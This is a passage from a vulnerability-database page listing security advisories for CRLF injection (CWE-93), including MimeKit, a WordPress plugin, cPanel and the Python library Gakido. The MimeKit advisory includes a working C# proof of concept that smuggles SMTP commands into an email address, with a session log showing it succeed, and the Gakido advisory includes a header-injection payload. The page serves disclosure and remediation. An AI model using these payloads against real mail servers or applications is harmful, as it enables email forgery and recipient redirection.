Common Weakness Enumeration

CWE-93

Allowed

Improper Neutralization of CRLF Sequences ('CRLF Injection')

Abstraction: Base · Status: Draft

The product uses CRLF (carriage return line feeds) as a special element, e.g. to separate lines or records, but it does not neutralize or incorrectly neutralizes CRLF sequences from inputs.

323 vulnerabilities reference this CWE, most recent first.

GHSA-G37J-43J6-2Q28

Vulnerability from github – Published: 2025-08-01 15:34 – Updated: 2026-01-31 00:30
VLAI
Details

A SQL injection vulnerability has been found in Gandia Integra Total of TESI from version 2.1.2217.3 to v4.4.2236.1. The vulnerability allows an authenticated attacker to retrieve, create, update and delete databases through the 'idestudio' parameter in /encuestas/integraweb[_v4]/integra/html/view/consultacuotasred.php.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-41376"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89",
      "CWE-93"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-01T13:15:27Z",
    "severity": "HIGH"
  },
  "details": "A SQL injection vulnerability has been found in Gandia Integra Total of TESI from version 2.1.2217.3 to v4.4.2236.1. The vulnerability allows an authenticated attacker to retrieve, create, update and delete databases through the \u0027idestudio\u0027 parameter in /encuestas/integraweb[_v4]/integra/html/view/consultacuotasred.php.",
  "id": "GHSA-g37j-43j6-2q28",
  "modified": "2026-01-31T00:30:28Z",
  "published": "2025-08-01T15:34:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41376"
    },
    {
      "type": "WEB",
      "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-gandia-integra-total-tesi"
    },
    {
      "type": "WEB",
      "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-limesurvey"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-G5Q2-6JVC-QFHH

Vulnerability from github – Published: 2026-06-22 12:32 – Updated: 2026-06-22 18:34
VLAI
Details

Net::Statsite::Client versions through 1.1.0 for Perl allow metric injections.

Net::Statsite::Client is a client for the statsite protocol, which is a variant of statsd.

Newlines are not removed from metric names, allowing metric injections.

Values are not sanitised for newlines or other protocol control characters such as colons or pipes, allowing metric injections.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-11373"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-93"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-22T12:16:24Z",
    "severity": "CRITICAL"
  },
  "details": "Net::Statsite::Client versions through 1.1.0 for Perl allow metric injections.\n\nNet::Statsite::Client is a client for the statsite protocol, which is a variant of statsd.\n\nNewlines are not removed from metric names, allowing metric injections.\n\nValues are not sanitised for newlines or other protocol control characters such as colons or pipes, allowing metric injections.",
  "id": "GHSA-g5q2-6jvc-qfhh",
  "modified": "2026-06-22T18:34:11Z",
  "published": "2026-06-22T12:32:02Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11373"
    },
    {
      "type": "WEB",
      "url": "https://metacpan.org/release/JASEI/Net-Statsite-Client-1.1.0/view/lib/Net/Statsite/Client.pm"
    },
    {
      "type": "WEB",
      "url": "https://security.metacpan.org/patches/N/Net-Statsite-Client/1.1.0/CVE-2026-11373-r1.patch"
    },
    {
      "type": "WEB",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-46719"
    },
    {
      "type": "WEB",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-46720"
    },
    {
      "type": "WEB",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-46739"
    },
    {
      "type": "WEB",
      "url": "http://armon.github.io/statsite"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-G7HC-96XR-GVVX

Vulnerability from github – Published: 2026-03-05 21:50 – Updated: 2026-03-06 22:52
VLAI
Summary
MimeKit has CRLF Injection in Quoted Local-Part that Enables SMTP Command Injection and Email Forgery
Details

Summary

A CRLF Injection vulnerability in MimeKit 4.15.0 allows an attacker to embed \r\n into the SMTP envelope address local-part (when the local-part is a quoted-string). This is non-compliant with RFC 5321 and can result in SMTP command injection (e.g., injecting additional RCPT TO / DATA / RSET commands) and/or mail header injection, depending on how the application uses MailKit/MimeKit to construct and send messages. The issue becomes exploitable when the attacker can influence a MailboxAddress (MAIL FROM / RCPT TO) value that is later serialized to an SMTP session.

RFC 5321 explicitly defines the SMTP mailbox local-part grammar and does not permit CR (13) or LF (10) inside Quoted-string (qtextSMTP and quoted-pairSMTP ranges exclude control characters). SMTP commands are terminated by <CRLF>, making CRLF injection in command arguments particularly dangerous.

Details

1) RFC 5321 local-part grammar prohibits CR/LF in quoted-string

RFC 5321 defines:

mail = "MAIL FROM:" Reverse-path [SP Mail-parameters] CRLF

Reverse-path = Path / "<>"
Path         = "<" [ A-d-l ":" ] Mailbox ">"
A-d-l        = At-domain *( "," At-domain )
At-domain    = "@" Domain

Mailbox         = Local-part "@" ( Domain / address-literal )
Local-part      = Dot-string / Quoted-string

Dot-string      = Atom *("." Atom)
Atom            = 1*atext
atext = ALPHA / DIGIT / 
        "!" / "#" / "$" / "%" / "&" / "'" / "*" / "+" / "-" / "/" / 
        "=" / "?" / "^" / "_" / "`" / "{" / "|" / "}" / "~"


Quoted-string   = DQUOTE *QcontentSMTP DQUOTE
QcontentSMTP    = qtextSMTP / quoted-pairSMTP
quoted-pairSMTP = %d92 %d32-126
qtextSMTP       = %d32-33 / %d35-91 / %d93-126

When the local part is a quoted string, the characters and are not allowed.

2) MimeKit 4.15.0 accepts CR/LF inside quoted local-part (non-compliant)

In the MimeKit 4.15.0 version, when parsing the local part, the and characters in the double-quoted form will not be detected. As a result, MailboxAddress can accept addresses like "attacker\r\nRCPT TO:<victim@target>\r\n"@example.com as a valid address.

3) Affected components / versions

  • MimeKit 4.15.0 (as tested)
  • MailKit 4.15.0 uses/depends on MimeKit 4.15.0 Any application that:
  • Accepts untrusted input for sender/recipient addresses, and
  • Constructs MailboxAddress from that input, and
  • Sends via SMTP (e.g., using MailKit SmtpClient), may be impacted.

PoC

Environment: - .NET SDK: 8.0.418 - Target Framework: net8.0 - Packages: MailKit 4.15.0 (with MimeKit 4.15.0) - Use ProtocolLogger to capture the SMTP session and confirm injection.

1) Create a minimal project:

mimekit_poc.csproj

<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net8.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
  </PropertyGroup>

  <ItemGroup>
    <PackageReference Include="MailKit" Version="4.15.0" />
  </ItemGroup>
</Project>
````

2. PoC program (replace SMTP host/port/address as needed):

```csharp
using MailKit.Net.Smtp;
using MailKit.Security;
using MailKit;
using MimeKit;

// === payload and target setting ===

var smtpHost = "xx.xx.xx.xx";
var smtpPort = 25;
var useTls = false;
// attack in `MAIL FROM` cmd with address grammar in double quote 
var payloadEvilMailFromInput = "\"attack\r\nRSET\r\nMAIL FROM:<kc1zs4@poc.send.com>\r\nRCPT TO:<xxx@xxx.xxx.xxx.xxx>\r\nDATA\r\n.\r\nQUIT\r\nhere\"@poc.send.com";
// log in log/smtp_log_{yyyyMMdd_HHmmss_fff}.txt
var logDir = Path.Combine(AppContext.BaseDirectory, "log");
Directory.CreateDirectory(logDir);
var timestamp = DateTime.Now.ToString("yyyyMMdd_HHmmss_fff");
var logPath = Path.Combine(logDir, $"smtp_log_{timestamp}");


// === below smtp session ===
// mimekit api

var envelopeFrom = new MailboxAddress("", payloadEvilMailFromInput);
var envelopeRcpt = new MailboxAddress("", "\"kc1zs4\"@poc.recv.com");
var headerFrom = new MailboxAddress("Sender", "kc1zs4@poc.send.com");
var headerTo = new MailboxAddress("Recipient", "kc1zs4@poc.recv.com");

var message = new MimeMessage();
message.From.Add(headerFrom);
message.To.Add(headerTo);
message.Subject = "mimekit CRLF injection poc";
message.Body = new TextPart("plain") { Text = "Hello from MimeKit 4.15.0" };

try {
    using var protocolLogger = new ProtocolLogger(logPath);
    using var client = new SmtpClient(protocolLogger);

    var socketOption = useTls ? SecureSocketOptions.StartTls : SecureSocketOptions.None;
    client.Connect(smtpHost, smtpPort, socketOption);

    client.Send(FormatOptions.Default, message, envelopeFrom, new[] { envelopeRcpt });
    client.Disconnect(true);

    Console.WriteLine("[+] successfully send mail");
    Console.WriteLine($"[+] view smtp session log at: {logPath}");

} catch (SmtpCommandException ex) {

    Console.Error.WriteLine($"[!] smtp cmd err: {ex.StatusCode} - {ex.Message}");
    Console.Error.WriteLine($"[!] view smtp session log at: {logPath}");
    Environment.ExitCode = 1;

} catch (SmtpProtocolException ex) {

    Console.Error.WriteLine($"[!] smtp protocol err: {ex.Message}");
    Console.Error.WriteLine($"[!] view smtp session log at: {logPath}");
    Environment.ExitCode = 1;

} catch (Exception ex) {

    Console.Error.WriteLine($"[!] unknown err: {ex.Message}");
    Console.Error.WriteLine($"[!] view smtp session log at: {logPath}");
    Environment.ExitCode = 1;
}
  1. Expected result

  2. MailboxAddress accepts the injected addr-spec containing CRLF inside the quoted local-part because it relies on quoted-string skipping that does not reject CR/LF.

  3. The generated SMTP session (captured by ProtocolLogger) shows the MAIL FROM line being split by the injected CRLF, followed by attacker-controlled SMTP commands.
  4. tcpdump also shows the same raw SMTP stream (optional confirmation).

Example (illustrative) excerpt from smtp session log showing the CRLF injection effect:

Connected to smtp://xxx.xxx.xxx.xxx:25/
S: 220 xxx Axigen ESMTP ready
C: EHLO KC1zs4-TPt14p
S: 250-xxx Axigen ESMTP hello
S: 250-PIPELINING
S: 250-AUTH PLAIN LOGIN CRAM-MD5 DIGEST-MD5 GSSAPI
S: 250-AUTH=PLAIN LOGIN CRAM-MD5 DIGEST-MD5 GSSAPI
S: 250-8BITMIME
S: 250-SIZE 10485760
S: 250-HELP
S: 250 OK
C: MAIL FROM:<"attack
C: RSET
C: MAIL FROM:<kc1zs4@poc.send.com>
C: RCPT TO:<xxx@xxx.xxx.xxx.xxx>
C: DATA
C: .
C: QUIT
C: here"@poc.send.com> SIZE=293
C: RCPT TO:<"kc1zs4"@poc.recv.com>
S: 553 Invalid mail address
S: 250 Reset done
S: 250 Sender accepted
S: 250 Recipient accepted
S: 354 Ready to receive data; remember <CRLF>.<CRLF>
S: 250 Mail queued for delivery
S: 221-xxx Axigen ESMTP is closing connection
S: 221 Good bye
C: RSET

Notes:

  • Whether the server executes the injected commands depends on server-side parsing/validation and SMTP pipeline state, but the client-side behavior (emitting CRLF into SMTP command stream via MailboxAddress) is sufficient to demonstrate the vulnerability class and protocol non-compliance.
  • SMTP commands are terminated by <CRLF>, so CRLF-in-argument is structurally hazardous by design.

Impact

Vulnerability class:

  • SMTP command injection / CRLF injection via envelope address (MAIL FROM / RCPT TO).
  • Protocol non-compliance with RFC 5321 local-part grammar for quoted-string (CR/LF not allowed).

Who is impacted:

  • Any application using MimeKit/MailKit to send email over SMTP where mailbox addresses are influenced by untrusted input (e.g., user-supplied “From” address, tenant-configurable sender identity, inbound-to-outbound forwarding rules, contact imports, webhook-driven mail sending, etc.).

Potential consequences:

  • Add or modify SMTP recipients by injecting extra RCPT TO commands (mail redirection / data exfiltration).
  • Corrupt the SMTP transaction state (RSET, NOOP, etc.) or attempt early DATA injection (server-dependent).
  • In some environments, may enable header injection if the attacker can pivot from envelope manipulation into message content workflows (application-dependent).
  • Logging/auditing evasion or misleading audit trails if the SMTP transcript is altered by injected command boundaries.

Suggested remediation (high level):

  • Reject \r and \n in local-part (and ideally anywhere) when parsing/constructing mailbox addresses used for SMTP envelopes.
  • Align quoted local-part parsing with RFC 5321’s qtextSMTP and quoted-pairSMTP ranges (no control characters).
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.15.0"
      },
      "package": {
        "ecosystem": "NuGet",
        "name": "MimeKit"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.15.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-30227"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-93"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-05T21:50:44Z",
    "nvd_published_at": "2026-03-06T21:16:16Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nA CRLF Injection vulnerability in MimeKit 4.15.0 allows an attacker to embed `\\r\\n` into the SMTP envelope address local-part (when the local-part is a quoted-string). This is non-compliant with RFC 5321 and can result in SMTP command injection (e.g., injecting additional `RCPT TO` / `DATA` / `RSET` commands) and/or mail header injection, depending on how the application uses MailKit/MimeKit to construct and send messages. The issue becomes exploitable when the attacker can influence a `MailboxAddress` (MAIL FROM / RCPT TO) value that is later serialized to an SMTP session.\n\nRFC 5321 explicitly defines the SMTP mailbox local-part grammar and does not permit CR (13) or LF (10) inside `Quoted-string` (qtextSMTP and quoted-pairSMTP ranges exclude control characters). SMTP commands are terminated by `\u003cCRLF\u003e`, making CRLF injection in command arguments particularly dangerous.\n\n### Details\n\n#### 1) RFC 5321 local-part grammar prohibits CR/LF in quoted-string\n\nRFC 5321 defines:\n\n```text\nmail = \"MAIL FROM:\" Reverse-path [SP Mail-parameters] CRLF\n\nReverse-path = Path / \"\u003c\u003e\"\nPath         = \"\u003c\" [ A-d-l \":\" ] Mailbox \"\u003e\"\nA-d-l        = At-domain *( \",\" At-domain )\nAt-domain    = \"@\" Domain\n\nMailbox         = Local-part \"@\" ( Domain / address-literal )\nLocal-part      = Dot-string / Quoted-string\n\nDot-string      = Atom *(\".\" Atom)\nAtom            = 1*atext\natext = ALPHA / DIGIT / \n        \"!\" / \"#\" / \"$\" / \"%\" / \"\u0026\" / \"\u0027\" / \"*\" / \"+\" / \"-\" / \"/\" / \n        \"=\" / \"?\" / \"^\" / \"_\" / \"`\" / \"{\" / \"|\" / \"}\" / \"~\"\n\n\nQuoted-string   = DQUOTE *QcontentSMTP DQUOTE\nQcontentSMTP    = qtextSMTP / quoted-pairSMTP\nquoted-pairSMTP = %d92 %d32-126\nqtextSMTP       = %d32-33 / %d35-91 / %d93-126\n```\n\nWhen the local part is a quoted string, the characters \u003cCR\u003e and \u003cLF\u003e are not allowed.\n\n#### 2) MimeKit 4.15.0 accepts CR/LF inside quoted local-part (non-compliant)\n\nIn the MimeKit 4.15.0 version, when parsing the local part, the \u003cCR\u003e and \u003cLF\u003e characters in the double-quoted form will not be detected.\nAs a result, `MailboxAddress` can accept addresses like `\"attacker\\r\\nRCPT TO:\u003cvictim@target\u003e\\r\\n\"@example.com` as a valid address.\n\n#### 3) Affected components / versions\n\n- MimeKit 4.15.0 (as tested)\n- MailKit 4.15.0 uses/depends on MimeKit 4.15.0\nAny application that:\n- Accepts untrusted input for sender/recipient addresses, and\n- Constructs `MailboxAddress` from that input, and\n- Sends via SMTP (e.g., using MailKit SmtpClient),\nmay be impacted.\n\n### PoC\n\nEnvironment:\n- .NET SDK: 8.0.418\n- Target Framework: net8.0\n- Packages: MailKit 4.15.0 (with MimeKit 4.15.0)\n- Use ProtocolLogger to capture the SMTP session and confirm injection.\n\n1) Create a minimal project:\n\nmimekit_poc.csproj\n```xml\n\u003cProject Sdk=\"Microsoft.NET.Sdk\"\u003e\n\n  \u003cPropertyGroup\u003e\n    \u003cOutputType\u003eExe\u003c/OutputType\u003e\n    \u003cTargetFramework\u003enet8.0\u003c/TargetFramework\u003e\n    \u003cImplicitUsings\u003eenable\u003c/ImplicitUsings\u003e\n    \u003cNullable\u003eenable\u003c/Nullable\u003e\n  \u003c/PropertyGroup\u003e\n\n  \u003cItemGroup\u003e\n    \u003cPackageReference Include=\"MailKit\" Version=\"4.15.0\" /\u003e\n  \u003c/ItemGroup\u003e\n\u003c/Project\u003e\n````\n\n2. PoC program (replace SMTP host/port/address as needed):\n\n```csharp\nusing MailKit.Net.Smtp;\nusing MailKit.Security;\nusing MailKit;\nusing MimeKit;\n\n// === payload and target setting ===\n\nvar smtpHost = \"xx.xx.xx.xx\";\nvar smtpPort = 25;\nvar useTls = false;\n// attack in `MAIL FROM` cmd with address grammar in double quote \nvar payloadEvilMailFromInput = \"\\\"attack\\r\\nRSET\\r\\nMAIL FROM:\u003ckc1zs4@poc.send.com\u003e\\r\\nRCPT TO:\u003cxxx@xxx.xxx.xxx.xxx\u003e\\r\\nDATA\\r\\n.\\r\\nQUIT\\r\\nhere\\\"@poc.send.com\";\n// log in log/smtp_log_{yyyyMMdd_HHmmss_fff}.txt\nvar logDir = Path.Combine(AppContext.BaseDirectory, \"log\");\nDirectory.CreateDirectory(logDir);\nvar timestamp = DateTime.Now.ToString(\"yyyyMMdd_HHmmss_fff\");\nvar logPath = Path.Combine(logDir, $\"smtp_log_{timestamp}\");\n\n\n// === below smtp session ===\n// mimekit api\n\nvar envelopeFrom = new MailboxAddress(\"\", payloadEvilMailFromInput);\nvar envelopeRcpt = new MailboxAddress(\"\", \"\\\"kc1zs4\\\"@poc.recv.com\");\nvar headerFrom = new MailboxAddress(\"Sender\", \"kc1zs4@poc.send.com\");\nvar headerTo = new MailboxAddress(\"Recipient\", \"kc1zs4@poc.recv.com\");\n\nvar message = new MimeMessage();\nmessage.From.Add(headerFrom);\nmessage.To.Add(headerTo);\nmessage.Subject = \"mimekit CRLF injection poc\";\nmessage.Body = new TextPart(\"plain\") { Text = \"Hello from MimeKit 4.15.0\" };\n\ntry {\n    using var protocolLogger = new ProtocolLogger(logPath);\n    using var client = new SmtpClient(protocolLogger);\n\n    var socketOption = useTls ? SecureSocketOptions.StartTls : SecureSocketOptions.None;\n    client.Connect(smtpHost, smtpPort, socketOption);\n\n    client.Send(FormatOptions.Default, message, envelopeFrom, new[] { envelopeRcpt });\n    client.Disconnect(true);\n\n    Console.WriteLine(\"[+] successfully send mail\");\n    Console.WriteLine($\"[+] view smtp session log at: {logPath}\");\n\n} catch (SmtpCommandException ex) {\n\n    Console.Error.WriteLine($\"[!] smtp cmd err: {ex.StatusCode} - {ex.Message}\");\n    Console.Error.WriteLine($\"[!] view smtp session log at: {logPath}\");\n    Environment.ExitCode = 1;\n\n} catch (SmtpProtocolException ex) {\n\n    Console.Error.WriteLine($\"[!] smtp protocol err: {ex.Message}\");\n    Console.Error.WriteLine($\"[!] view smtp session log at: {logPath}\");\n    Environment.ExitCode = 1;\n\n} catch (Exception ex) {\n\n    Console.Error.WriteLine($\"[!] unknown err: {ex.Message}\");\n    Console.Error.WriteLine($\"[!] view smtp session log at: {logPath}\");\n    Environment.ExitCode = 1;\n}\n```\n\n3. Expected result\n\n* `MailboxAddress` accepts the injected addr-spec containing CRLF inside the quoted local-part because it relies on quoted-string skipping that does not reject CR/LF.\n* The generated SMTP session (captured by ProtocolLogger) shows the `MAIL FROM` line being split by the injected CRLF, followed by attacker-controlled SMTP commands.\n* `tcpdump` also shows the same raw SMTP stream (optional confirmation).\n\nExample (illustrative) excerpt from smtp session log showing the CRLF injection effect:\n\n```txt\nConnected to smtp://xxx.xxx.xxx.xxx:25/\nS: 220 xxx Axigen ESMTP ready\nC: EHLO KC1zs4-TPt14p\nS: 250-xxx Axigen ESMTP hello\nS: 250-PIPELINING\nS: 250-AUTH PLAIN LOGIN CRAM-MD5 DIGEST-MD5 GSSAPI\nS: 250-AUTH=PLAIN LOGIN CRAM-MD5 DIGEST-MD5 GSSAPI\nS: 250-8BITMIME\nS: 250-SIZE 10485760\nS: 250-HELP\nS: 250 OK\nC: MAIL FROM:\u003c\"attack\nC: RSET\nC: MAIL FROM:\u003ckc1zs4@poc.send.com\u003e\nC: RCPT TO:\u003cxxx@xxx.xxx.xxx.xxx\u003e\nC: DATA\nC: .\nC: QUIT\nC: here\"@poc.send.com\u003e SIZE=293\nC: RCPT TO:\u003c\"kc1zs4\"@poc.recv.com\u003e\nS: 553 Invalid mail address\nS: 250 Reset done\nS: 250 Sender accepted\nS: 250 Recipient accepted\nS: 354 Ready to receive data; remember \u003cCRLF\u003e.\u003cCRLF\u003e\nS: 250 Mail queued for delivery\nS: 221-xxx Axigen ESMTP is closing connection\nS: 221 Good bye\nC: RSET\n```\n\nNotes:\n\n* Whether the server executes the injected commands depends on server-side parsing/validation and SMTP pipeline state, but the client-side behavior (emitting CRLF into SMTP command stream via `MailboxAddress`) is sufficient to demonstrate the vulnerability class and protocol non-compliance.\n* SMTP commands are terminated by `\u003cCRLF\u003e`, so CRLF-in-argument is structurally hazardous by design.\n\n### Impact\n\nVulnerability class:\n\n* SMTP command injection / CRLF injection via envelope address (MAIL FROM / RCPT TO).\n* Protocol non-compliance with RFC 5321 local-part grammar for quoted-string (CR/LF not allowed).\n\nWho is impacted:\n\n* Any application using MimeKit/MailKit to send email over SMTP where mailbox addresses are influenced by untrusted input (e.g., user-supplied \u201cFrom\u201d address, tenant-configurable sender identity, inbound-to-outbound forwarding rules, contact imports, webhook-driven mail sending, etc.).\n\nPotential consequences:\n\n* Add or modify SMTP recipients by injecting extra `RCPT TO` commands (mail redirection / data exfiltration).\n* Corrupt the SMTP transaction state (`RSET`, `NOOP`, etc.) or attempt early `DATA` injection (server-dependent).\n* In some environments, may enable header injection if the attacker can pivot from envelope manipulation into message content workflows (application-dependent).\n* Logging/auditing evasion or misleading audit trails if the SMTP transcript is altered by injected command boundaries.\n\nSuggested remediation (high level):\n\n* Reject `\\r` and `\\n` in local-part (and ideally anywhere) when parsing/constructing mailbox addresses used for SMTP envelopes.\n* Align quoted local-part parsing with RFC 5321\u2019s `qtextSMTP` and `quoted-pairSMTP` ranges (no control characters).",
  "id": "GHSA-g7hc-96xr-gvvx",
  "modified": "2026-03-06T22:52:51Z",
  "published": "2026-03-05T21:50:44Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/jstedfast/MimeKit/security/advisories/GHSA-g7hc-96xr-gvvx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30227"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/jstedfast/MimeKit"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "MimeKit has CRLF Injection in Quoted Local-Part that Enables SMTP Command Injection and Email Forgery"
}

GHSA-G8MP-PX4H-FW43

Vulnerability from github – Published: 2026-02-18 06:30 – Updated: 2026-02-18 06:30
VLAI
Details

The ShopLentor – WooCommerce Builder for Elementor & Gutenberg +21 Modules – All in One Solution plugin for WordPress is vulnerable to Email Relay Abuse in all versions up to, and including, 3.3.2. This is due to the lack of validation on the 'send_to', 'product_title', 'wlmessage', and 'wlemail' parameters in the 'woolentor_suggest_price_action' AJAX endpoint. This makes it possible for unauthenticated attackers to send arbitrary emails to any recipient with full control over the subject line, message content, and sender address (via CRLF injection in the 'wlemail' parameter), effectively turning the website into a full email relay for spam or phishing campaigns.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-1714"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-93"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-18T05:16:27Z",
    "severity": "HIGH"
  },
  "details": "The ShopLentor \u2013 WooCommerce Builder for Elementor \u0026 Gutenberg +21 Modules \u2013 All in One Solution plugin for WordPress is vulnerable to Email Relay Abuse in all versions up to, and including, 3.3.2. This is due to the lack of validation on the \u0027send_to\u0027, \u0027product_title\u0027, \u0027wlmessage\u0027, and \u0027wlemail\u0027 parameters in the \u0027woolentor_suggest_price_action\u0027 AJAX endpoint. This makes it possible for unauthenticated attackers to send arbitrary emails to any recipient with full control over the subject line, message content, and sender address (via CRLF injection in the \u0027wlemail\u0027 parameter), effectively turning the website into a full email relay for spam or phishing campaigns.",
  "id": "GHSA-g8mp-px4h-fw43",
  "modified": "2026-02-18T06:30:19Z",
  "published": "2026-02-18T06:30:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1714"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/tags/3.3.1/classes/class.ajax_actions.php#L170"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/tags/3.3.1/classes/class.ajax_actions.php#L189"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/tags/3.3.1/classes/class.ajax_actions.php#L192"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/classes/class.ajax_actions.php#L170"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/classes/class.ajax_actions.php#L189"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/classes/class.ajax_actions.php#L192"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3461704/woolentor-addons/trunk/classes/class.ajax_actions.php?contextall=1"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cf326914-6a38-4984-a2a7-66e05f41a96b?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GC4W-FJW4-FM3H

Vulnerability from github – Published: 2026-05-14 00:31 – Updated: 2026-05-14 00:31
VLAI
Details

Improper sanitization of the status query parameter of the /unprotected/nova_error endpoint allows unauthenticated attacker to inject arbitrary HTTP header to the response.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-32993"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-93"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-13T22:16:43Z",
    "severity": "HIGH"
  },
  "details": "Improper sanitization of the `status` query parameter of the `/unprotected/nova_error` endpoint allows unauthenticated attacker to inject arbitrary HTTP header to the response.",
  "id": "GHSA-gc4w-fjw4-fm3h",
  "modified": "2026-05-14T00:31:56Z",
  "published": "2026-05-14T00:31:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32993"
    },
    {
      "type": "WEB",
      "url": "https://support.cpanel.net/hc/en-us/articles/40437313190295-Security-CVE-2026-32993-cPanel-WHM-WP2-Security-Update-May-13-2026"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GCGX-CHCP-HXP9

Vulnerability from github – Published: 2026-01-26 23:29 – Updated: 2026-01-29 03:25
VLAI
Summary
Gakido vulnerable to HTTP Header Injection (CRLF Injection)
Details

A vulnerability was discovered in Gakido that allowed HTTP Header Injection through CRLF (Carriage Return Line Feed) sequences in user-supplied header values and names.

When making HTTP requests with user-controlled header values containing \r\n (CRLF), \n (LF), or \x00 (null byte) characters, an attacker could inject arbitrary HTTP headers into the request.

Impact

An attacker who can control header values passed to Gakido's Client.get(), Client.post(), or other request methods could:

  1. Inject arbitrary HTTP headers - Add malicious headers to requests
  2. HTTP Response Splitting - Potentially manipulate responses in certain proxy configurations
  3. Cache Poisoning - Inject headers that could poison intermediate caches
  4. Session Fixation - Inject session-related headers
  5. Bypass Security Controls - Inject headers that bypass server-side security checks

Proof of Concept

from gakido import Client

# Before fix: X-Injected header would be sent as a separate header
c = Client(impersonate="chrome_120")
r = c.get("https://httpbin.org/headers", headers={
    "User-Agent": "test\r\nX-Injected: pwned"
})

# The server would receive:
# User-Agent: test
# X-Injected: pwned

Affected Code

The vulnerability existed in the header processing logic where user-supplied headers were not sanitized before being sent in HTTP requests.

File: gakido/headers.py
Function: canonicalize_headers()

Fix

The fix adds a _sanitize_header() function that strips \r, \n, and \x00 characters from both header names and values before they are included in HTTP requests.

def _sanitize_header(name: str, value: str) -> tuple[str, str]:
    """
    Sanitize header name and value to prevent HTTP header injection (CRLF injection).
    Strips CR, LF, and null bytes from both name and value.
    """
    clean_name = name.replace("\r", "").replace("\n", "").replace("\x00", "")
    clean_value = value.replace("\r", "").replace("\n", "").replace("\x00", "")
    return clean_name, clean_value
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "gakido"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-24489"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-113",
      "CWE-93"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-26T23:29:57Z",
